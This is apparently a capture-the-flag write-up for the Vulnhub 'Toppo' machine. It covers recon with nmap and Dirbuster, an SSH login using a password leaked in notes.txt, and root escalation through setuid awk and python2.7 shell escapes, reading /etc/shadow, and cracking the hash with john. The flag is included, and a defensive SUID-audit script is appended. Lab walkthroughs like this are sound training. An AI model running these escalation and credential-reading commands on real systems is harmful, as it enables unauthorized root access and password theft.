infosecwriteups.com

Vulnhub Write-up — Toppo

Yash Anand

This is the write-up of the Machine Toppo from Vulnhub.

DIGEST

Toppo is a beginner-friendly machine based on Linux. A note from the admin (notes.txt) gives us the user, and exploiting SUID executables gives us root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The IP address is given so no need for netdiscover.

Scanning The Network

nmap -sC -sV 192.168.0.103

man nmap

nmap on Toppo

Dirbuster on port 80

Dirbuster Result

Found notes.txt under the admin directory.

/admin/notes.txt

The note above gives us the password: 12345ted123

So let's guess the username ted and try to log in over SSH.

Own User

Logging in over SSH

$ whoami; id

man whoami ;id

Own User

Privilege Escalation

I am using this script (linuxprivchecker.py) to find possible privilege escalation methods.

$python -m SimpleHTTPServer

Starting the web server locally to upload the privchecker on the toppo machine.

starting python server

Downloading the privchecker in toppo

$ chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

Running the script on toppo.

Running privchecker

The script lists several shell escape sequences. I am using awk here; you can try any of them.

Output

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'

man awk

Own user using awk

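/bin/bash did not give us root because bash has privilege escalation protection: it drops elevated privileges when its effective UID differs from its real UID, unless it is started with -p. The /bin/sh here has no such protection.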

Let's try a different method for privilege escalation. While searching on the internet I found this article.

Root using python

find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

snap from the above URL

Finding the perm

python2.7 is exploitable: see the SUID bit.

$ python2.7 -c "import pty; pty.spawn('/bin/sh');"

Own user using python
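
From the defender's side, the same SUID search can be run as an audit that separates root-owned setuid interpreters (the condition that made python2.7 and awk usable above) from the setuid files a distribution normally ships. This is an added example, not part of the original write-up; the SHELL_CAPABLE set, the function names and the sample paths are assumptions made for illustration.

```python
import os
import stat

# Assumption for this example: programs able to run arbitrary commands, which
# should never be setuid. Extend the set to match your own baseline.
SHELL_CAPABLE = {"awk", "mawk", "gawk", "python", "perl", "ruby",
                 "vim", "find", "sh", "bash", "dash"}

def base_name(path):
    """Drop directory and version suffix: /usr/bin/python2.7 -> python."""
    return os.path.basename(path).rstrip("0123456789.")

def classify(mode, owner_uid, path):
    """Return 'critical', 'review' or None for one file's mode, owner and path."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return None  # symlinks, directories and files without setuid/setgid
    if mode & stat.S_ISUID and owner_uid == 0 and base_name(path) in SHELL_CAPABLE:
        return "critical"  # root-owned setuid interpreter: remove the bit
    return "review"  # compare against the distribution's expected list

def audit(root="/", max_depth=3):
    """Walk root to the same depth as the find command and classify each file."""
    findings = []
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root):
        depth = 0 if dirpath == root else os.path.relpath(dirpath, root).count(os.sep) + 1
        if depth >= max_depth - 1:
            dirnames[:] = []  # files here are already at max_depth
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue
            level = classify(st.st_mode, st.st_uid, path)
            if level:
                findings.append((level, stat.filemode(st.st_mode), path))
    return sorted(findings)

if __name__ == "__main__":
    # Constructed sample entries (mode, owner uid, path), not output from Toppo.
    sample = [(0o104755, 0, "/usr/bin/python2.7"), (0o104755, 0, "/usr/bin/passwd")]
    for mode, uid, path in sample:
        print(classify(mode, uid, path), stat.filemode(mode), path)
    for finding in audit("/"):
        print(*finding)
```

A "critical" finding is cleared with chmod u-s on the file; "review" entries are checked against the setuid files the installed packages are expected to ship.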

Cracking the root password

$awk 'BEGIN{system("cat /etc/shadow")}'

/etc/shadow file

Finding the hash type using john

john --wordlist=/usr/share/john/password.lst --format=sha512crypt crack

Cracking the root password using john

Own Root

Own root using the password

Flag

0wnedlab{p4ssi0n_c0me_with_pract1ce}

❤️ by inc0gnito